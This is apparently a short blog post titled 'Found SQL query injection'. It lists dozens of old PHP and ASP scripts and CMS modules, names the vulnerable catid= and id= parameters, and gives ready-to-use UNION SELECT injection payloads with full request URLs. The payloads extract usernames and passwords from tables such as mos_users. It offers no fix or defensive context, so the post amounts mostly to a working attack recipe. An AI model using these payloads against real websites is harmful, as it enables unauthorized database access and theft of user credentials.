Found SQL query injection

Script names:

Active Auction Pro
Active Buy and Sell
Active Link Engine
Active Photo Gallery
Active Trade
Ace Image Hosting Script
AdServe (Wordpress plugin)
aflog
Aktueldownload Script
AlstraSoft Video Share Enterprise
ANGEL Learning Management Suite
Articles (Xoops module)
AV Arcade
Berthanas Ziyaretci Defteri
boastMachine
CascadianFAQ
CMX Acronym (phpBB module)
Content Injector
Creascripts Creadirectory
DGNews
Digiappz DigiAffiliate
E-Vendejo
EfesTECH Haber
eMeeting Dating Software
eSyndiCat Directory Software
EXO PHPDesk
Flinx
FriendFinder (Xoops module)
GeometriX Download Portal
Glossaire (Xoops module)
Glossary (Mambo module)
GPS Content Management System
Grayscale Blog
Hunkaray Duyuru Scripti
iG Calendar
iG Shop
JBlog
Jeuxflash (KwsPHP module)
JobSite Professional
Kolayindir Download
Kshop (Xoops module)
LoveCMS
LushiNews
LushiWarPlaner
MGB
MiNT Haber Sistemi
My Little Forum
NeoRecruit (Joomla module)
NMDeluxe
Noname Media Photo Galerie
Okul Web Otomasyon Sistemi
OpenLD
PHP Event Calendar
PHP Homepage M
PHPEcho CMS
phpMyQuote
Pony Gallery Random Image (Joomla module)
phpns
Planetgraphic ASP News
PollMentor
ProfileCMS
Proxy Anket
QuickTicket
Recipes (Mambo module)
RunawaySoft Haber Portal
ScriptMagix Jokes
ScriptMagix Recipes
SH-News
Simple Web Content Management System
SimpleBlog
SonicBB
Stride
TLM CMS
Toko Instan
TotalCalendar
Tiger Php News System
v4bJournal (PostNuke module)
Vizayn Haber
WavelinkMedia TutorialCMS
Web Template Management System
Webace-Linkscript
Webformatique Car Manager
webSPELL
WolioCMS
WP-Cal (Wordpress plugin)
X-dev xNews
X-ice Haber Sistemi
Youtube Clone
WSN Links Basic Edition


Parameters affected by SQL injection:
catid=
id=

SQL query injection:

-1 union select 1,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11 from mos_users--
--------------------------------------------------------------------------------
-9 union select 1,concat(0x53694B6F646F51,0x7c,user),id,4,email,password from user/*

URL requested:
/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,%20password),6,7,8,9,10,11%20from%20mos_users--
--------------------------------------------------------------------------------
/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,concat(0x53694B6F646F51,0x7c,user),id,4,email,password%20from%20user/*
Reviewed by Furkan Samadha on 8:18 AM